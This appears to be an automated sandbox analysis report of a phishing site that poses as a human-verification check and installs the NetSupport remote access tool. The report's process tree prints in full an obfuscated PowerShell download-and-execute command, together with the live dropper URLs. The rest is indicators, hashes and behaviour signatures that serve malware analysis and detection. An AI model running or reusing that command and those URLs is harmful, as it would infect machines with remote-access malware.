Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://holidaybunch...

windows10-2004-x64

10

Resubmissions

23-10-2024 01:15

241023-bmlphstemh 4

23-10-2024 00:50

241023-a65q3asfkh 4

23-10-2024 00:31

241023-at4y1asana 4

22-10-2024 14:58

241022-schzba1apc 10

22-10-2024 12:40

241022-pwj4yavgmd 10

Analysis

  • max time kernel
    112s
  • max time network
    113s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-10-2024 12:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://holidaybunch.com

Score
10/10
netsupportdefense_evasiondiscoverypersistencephishingrat

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://holidaybunch.com/Ray-verify.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://traversecityspringbreak.com/o/o.png

Extracted

Language
hta
Source
URLs
hta.dropper

https://holidaybunch.com/Ray-verify.html

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
    defense_evasion
  • Detected phishing page
    phishing
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://holidaybunch.com
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4532
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9da5d46f8,0x7ff9da5d4708,0x7ff9da5d4718
      2⤵
        PID:4992
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
        2⤵
          PID:1880
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4072
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
          2⤵
            PID:2600
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
            2⤵
              PID:3212
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
              2⤵
                PID:2716
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 /prefetch:8
                2⤵
                  PID:1484
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3616
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
                  2⤵
                    PID:4560
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
                    2⤵
                      PID:1688
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
                      2⤵
                        PID:1664
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
                        2⤵
                          PID:3264
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1268 /prefetch:8
                          2⤵
                            PID:3752
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
                            2⤵
                              PID:5400
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
                              2⤵
                                PID:5420
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7984007047937855835,10109432745257710722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
                                2⤵
                                  PID:1344
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:852
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:3472
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                    1⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5884
                                    • C:\Windows\system32\mshta.exe
                                      "C:\Windows\system32\mshta.exe" https://holidaybunch.com/Ray-verify.html
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Checks computer location settings
                                      PID:3776
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                        3⤵
                                        • Blocklisted process makes network request
                                        • Adds Run key to start application
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1320
                                        • C:\Windows\system32\ipconfig.exe
                                          "C:\Windows\system32\ipconfig.exe" /flushdns
                                          4⤵
                                          • Gathers network information
                                          PID:1240
                                        • C:\Windows\system32\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Admin\AppData\Roaming\XIcNnz
                                          4⤵
                                          • Hide Artifacts: Hidden Files and Directories
                                          PID:5296
                                          • C:\Windows\system32\attrib.exe
                                            attrib +h C:\Users\Admin\AppData\Roaming\XIcNnz
                                            5⤵
                                            • Views/modifies file attributes
                                            PID:4660
                                        • C:\Users\Admin\AppData\Roaming\XIcNnz\client32.exe
                                          "C:\Users\Admin\AppData\Roaming\XIcNnz\client32.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of FindShellTrayWindow
                                          PID:2024
                                  • C:\Windows\system32\mshta.exe
                                    "C:\Windows\system32\mshta.exe" https://holidaybunch.com/Ray-verify.html #  ''Verify you are human - Ray Verification ID: 4457''
                                    1⤵
                                    • Blocklisted process makes network request
                                    • Checks computer location settings
                                    PID:5508
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5368
                                      • C:\Windows\system32\ipconfig.exe
                                        "C:\Windows\system32\ipconfig.exe" /flushdns
                                        3⤵
                                        • Gathers network information
                                        PID:5452
                                      • C:\Windows\system32\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Admin\AppData\Roaming\UNEFGB
                                        3⤵
                                        • Hide Artifacts: Hidden Files and Directories
                                        PID:5412
                                        • C:\Windows\system32\attrib.exe
                                          attrib +h C:\Users\Admin\AppData\Roaming\UNEFGB
                                          4⤵
                                          • Views/modifies file attributes
                                          PID:1776
                                      • C:\Users\Admin\AppData\Roaming\UNEFGB\client32.exe
                                        "C:\Users\Admin\AppData\Roaming\UNEFGB\client32.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:1800

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                                    Filesize

                                    717B

                                    MD5

                                    822467b728b7a66b081c91795373789a

                                    SHA1

                                    d8f2f02e1eef62485a9feffd59ce837511749865

                                    SHA256

                                    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

                                    SHA512

                                    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\196AD40024E5F78561D5C03D3B639D9E
                                    Filesize

                                    504B

                                    MD5

                                    533ec3228ebaa538769d80ea20108f1b

                                    SHA1

                                    f759235ce1f69f815b1a0b1d6c61b35ab06e45ce

                                    SHA256

                                    609911fd6c084bd47bef8777f185d8ca2ea5330a02bd8695b874d1688ebe4096

                                    SHA512

                                    d1876e3e32cfdeea99ce88de8268018719787e728add99b3650bef004a103622a04141b34d39a4782c15d911b68eda5e016619beefa087680324a3c47f023607

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
                                    Filesize

                                    192B

                                    MD5

                                    aa644272833ae799e4ddc2ec4ea9cbed

                                    SHA1

                                    66524734b600a53c9b4dff90f876e095b60bbe31

                                    SHA256

                                    29bb64f6a2abd279b6ad989de1be60a542af0f6dc2d1d2b0c1533cf872271ae0

                                    SHA512

                                    43b84f37288f5c69e3e60d5406a4deee8cfad8407a42db92006e6032c6fb3972f4574a2ec8467e368370686e3021f296690dc36f467cc718d9f3756556c6d1b4

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\196AD40024E5F78561D5C03D3B639D9E
                                    Filesize

                                    550B

                                    MD5

                                    a61dca5eba803487196458c02ed66171

                                    SHA1

                                    bf2d139dad74dfbeaa6d5b455a3d70baf0cada47

                                    SHA256

                                    feb51c716c6cdc73d52c1cd0938ae92921047893f363db3ec6dc490282245806

                                    SHA512

                                    86800f9b72dd46f40b4866662ff067d336f14a67ca371ebd91308db5d465aa1eab85cb986946fcc65ca18d2307824b675d04ed8ff99a7ad4ffe0d31f1bd96e96

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                    Filesize

                                    3KB

                                    MD5

                                    bb925cc5c32a817b61b5a68f00475ac2

                                    SHA1

                                    368bbcd93d46036334f385fe80a6315130a873f4

                                    SHA256

                                    cab89442f228f263a88d3db648093b2389fa2676ee3f95fccdd7c9574a8e1c11

                                    SHA512

                                    69688f4277b0dfdeca560166776ecc74ae2933d6808e849ac60e0eb2310333d37e6216edb23737459a0e2395594a1cd579bccd008499e08526393d96315b4634

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                    Filesize

                                    152B

                                    MD5

                                    0a9dc42e4013fc47438e96d24beb8eff

                                    SHA1

                                    806ab26d7eae031a58484188a7eb1adab06457fc

                                    SHA256

                                    58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151

                                    SHA512

                                    868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                    Filesize

                                    152B

                                    MD5

                                    61cef8e38cd95bf003f5fdd1dc37dae1

                                    SHA1

                                    11f2f79ecb349344c143eea9a0fed41891a3467f

                                    SHA256

                                    ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e

                                    SHA512

                                    6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\6ab0b855-310f-4f0b-9d95-4f3b4e119251.tmp
                                    Filesize

                                    5KB

                                    MD5

                                    138923dd1c325b32290b1e431a812f61

                                    SHA1

                                    a839716ce9dc0236739f1af04376bceddaf5ba64

                                    SHA256

                                    eaa0ffa5563e98d43ac8187415ed0fb4e95536cc5d3a576b5afb87737176a2ce

                                    SHA512

                                    e77198caaab251e05b6bf95b95e5a856cdbad03165eb3648aabddc90751ef7674c39f1666c5c9b563fb55894c50157f80b8c5bfd07dd8389d44613e89ebe2536

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                    Filesize

                                    323B

                                    MD5

                                    85897617b01379c0a1c4ecfe62816eb2

                                    SHA1

                                    13ad93c0bdf8e9d710aa6dfc71ff6a39164eb9f5

                                    SHA256

                                    59afd97ce3a115fe84eb89f8374d9ff204b1ae4065954394be865b69b06daca5

                                    SHA512

                                    0d33f6ba6d8550cb6aadb15e45531c3ae9c32fb1f136bce55984396486e1f1f3a9c8916a3061d127d145ec546132f203235567b7874418dbf5db3e3594d1bc9f

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                    Filesize

                                    6KB

                                    MD5

                                    3421f7b1b92bcb830bd6718420f5f4df

                                    SHA1

                                    35ba35979851e4ee143a54340b7789089e42a1c3

                                    SHA256

                                    25a190228a2ad3a8712a8e9131c109799030623ab39ae9bee9b34d6d8b6f0024

                                    SHA512

                                    4f79fbff9f8350611a23f68a863f14f2659a602512a6cc1162c0b3a298752a552310b413ab1b423d1af0569645ccc78debb9e2ec1a812dcab5f5f85676d0e15f

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                    Filesize

                                    6KB

                                    MD5

                                    b69504c9ce43fa70dbff5e513965bd16

                                    SHA1

                                    cbf58f2b009fb315af54660979f1a40687957f33

                                    SHA256

                                    e48694abc420b2f5e3954134d4e5df79efd642ca33ed95f11f3fc0dfa808323f

                                    SHA512

                                    2037611243100737ef4ade4e24a574662cb1248407a0c7b9d68c6386165d1a4007ca565d0a22879da2c768308600aa05b238ec352f2d7b76c0c2f7b774ae21df

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                    Filesize

                                    6KB

                                    MD5

                                    c3d4a19eb29ffd77875c868d958e1ce0

                                    SHA1

                                    6dced5d18c711658fc267efd178ae2c4b62247b0

                                    SHA256

                                    d2a2876aad2b76c578fc43fd80236eed7e113f604b98fefebbef44b11b34a878

                                    SHA512

                                    4a224e5f0ee935bf983f1a376109784e8c44c097420a0d20888ef6c60af45f60059d36f05caaafb79ee05346bc6c80b2bc70f0a1d4e28b329b67385d11843fab

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                    Filesize

                                    6KB

                                    MD5

                                    1c3bc619bad41b194b1810d7d4fc4666

                                    SHA1

                                    d5127805f646e20a097740b47302944f104b054f

                                    SHA256

                                    c3a3d04a05f90791b8c02731b15d953aca51e8ed7d04aa1e1c3d99612b3a4d8c

                                    SHA512

                                    17377c9580a8f80a39dabbb314a0c0e0fc69dbcd044ee760d7349a24f85d3610ab873616b35ce1ac4f95a5ebf71d5ebec9cd7c950a457c31acdd211bf99db03b

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                    Filesize

                                    16B

                                    MD5

                                    6752a1d65b201c13b62ea44016eb221f

                                    SHA1

                                    58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                    SHA256

                                    0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                    SHA512

                                    9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                    Filesize

                                    11KB

                                    MD5

                                    ad1ce4b6ec1a8ebd08cc792f6ef53e03

                                    SHA1

                                    817ff63816b4e974f03e7238f39b70674302ad08

                                    SHA256

                                    9b5a13235a1a85fc15b970be5920c29141d871ef52cd74218a17b4302b36daab

                                    SHA512

                                    27ec7e8aabee5b5efdef32976a1ae4d0961c1b4d8029405cc2db26a0f593ae86c37d3d6976a8bc50393fa83866e43afdad773117f174e25e962c66e21a2a5095

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                    Filesize

                                    12KB

                                    MD5

                                    d3a0f6a9a4734971fe358fbe63801264

                                    SHA1

                                    819fafa66944bca01340681adcab24cdc4405a20

                                    SHA256

                                    b80f3240324e1ba18bad37d50bb2f76761487f1b7cd6701220b2ab55f9c3edc5

                                    SHA512

                                    27f9337436c34750fdab05938f0ff1983c6530b98992d732424c766488c685025d7c3e8c59eaa6e61c2b828df1a788c6ac6a02f3a2f7ea22a9d32612e3e5b099

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                    Filesize

                                    11KB

                                    MD5

                                    1ec43999e80fafe5d478dc41e13dbea6

                                    SHA1

                                    e086fbaf3b4fb5d41b51b3cb027292c67a482c2f

                                    SHA256

                                    618e1cbafab234ecfbbeceecf98c070dd882599a8fc105e8aead8156c35d39ed

                                    SHA512

                                    c91be08ee9bc2a7f8cb5dd68ec3985c39129bc755f2fb77142a940d31898bbb4f763850f2d12101e3242c09664c5c4c405f02035040d7353ec04a205ce24eb80

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\M6JHG9EK\Ray-verify[1].htm
                                    Filesize

                                    10KB

                                    MD5

                                    977bb6913b1f65a6472727ea4f362e97

                                    SHA1

                                    1d1247a8f9359576c913e9586d72f0d51773b22c

                                    SHA256

                                    cace794532ffc2a8275c86e4248ca38cf85dfb209d630e05e049d6fe2047ea2e

                                    SHA512

                                    02e3d08afed87051cd5d7de046cfece58731901ef985f8a76e4110130ed4a364abac06e77d124e185e146502bf4170aaf07e81272db9c100faff878acfe48efa

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                    Filesize

                                    53KB

                                    MD5

                                    a26df49623eff12a70a93f649776dab7

                                    SHA1

                                    efb53bd0df3ac34bd119adf8788127ad57e53803

                                    SHA256

                                    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                    SHA512

                                    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    Filesize

                                    1KB

                                    MD5

                                    f8d061cb5bbb2559aaf515aec28227a0

                                    SHA1

                                    24251cc79b5c4f61c8154be0a18c5127713c796f

                                    SHA256

                                    ce7532548c92e3d3da457e2e8fa83ad4077a52af322c2b8635ca19cbbdc38269

                                    SHA512

                                    a02b2b0f43fef99513543d3be68c2fcad0dd6e66aa6c63e58f9874a51c27f58cdac79c4d9059a92d6a3e5b5235c9ad294abd2716109335f917e7df092980bf8f

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jncwi4zi.mas.ps1
                                    Filesize

                                    60B

                                    MD5

                                    d17fe0a3f47be24a6453e9ef58c94641

                                    SHA1

                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                    SHA256

                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                    SHA512

                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\HTCTL32.DLL
                                    Filesize

                                    320KB

                                    MD5

                                    2d3b207c8a48148296156e5725426c7f

                                    SHA1

                                    ad464eb7cf5c19c8a443ab5b590440b32dbc618f

                                    SHA256

                                    edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

                                    SHA512

                                    55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\NSM.LIC
                                    Filesize

                                    257B

                                    MD5

                                    7067af414215ee4c50bfcd3ea43c84f0

                                    SHA1

                                    c331d410672477844a4ca87f43a14e643c863af9

                                    SHA256

                                    2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12

                                    SHA512

                                    17b888087192bcea9f56128d0950423b1807e294d1c4f953d1bf0f5bd08e5f8e35afeee584ebf9233bfc44e0723db3661911415798159ac118c8a42aaf0b902f

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\PCICHEK.DLL
                                    Filesize

                                    18KB

                                    MD5

                                    a0b9388c5f18e27266a31f8c5765b263

                                    SHA1

                                    906f7e94f841d464d4da144f7c858fa2160e36db

                                    SHA256

                                    313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

                                    SHA512

                                    6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\PCICL32.DLL
                                    Filesize

                                    3.6MB

                                    MD5

                                    00587238d16012152c2e951a087f2cc9

                                    SHA1

                                    c4e27a43075ce993ff6bb033360af386b2fc58ff

                                    SHA256

                                    63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

                                    SHA512

                                    637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\client32.exe
                                    Filesize

                                    117KB

                                    MD5

                                    ee75b57b9300aab96530503bfae8a2f2

                                    SHA1

                                    98dd757e1c1fa8b5605bda892aa0b82ebefa1f07

                                    SHA256

                                    06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268

                                    SHA512

                                    660259bb0fd317c7fb76505da8cbc477e146615fec10e02779cd4f527aeb00caed833af72f90b128bb62f10326209125e809712d9acb41017e503126e5f85673

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\XIcNnz\client32.ini
                                    Filesize

                                    617B

                                    MD5

                                    7c6854f484a279e9642d2daa9fbb9993

                                    SHA1

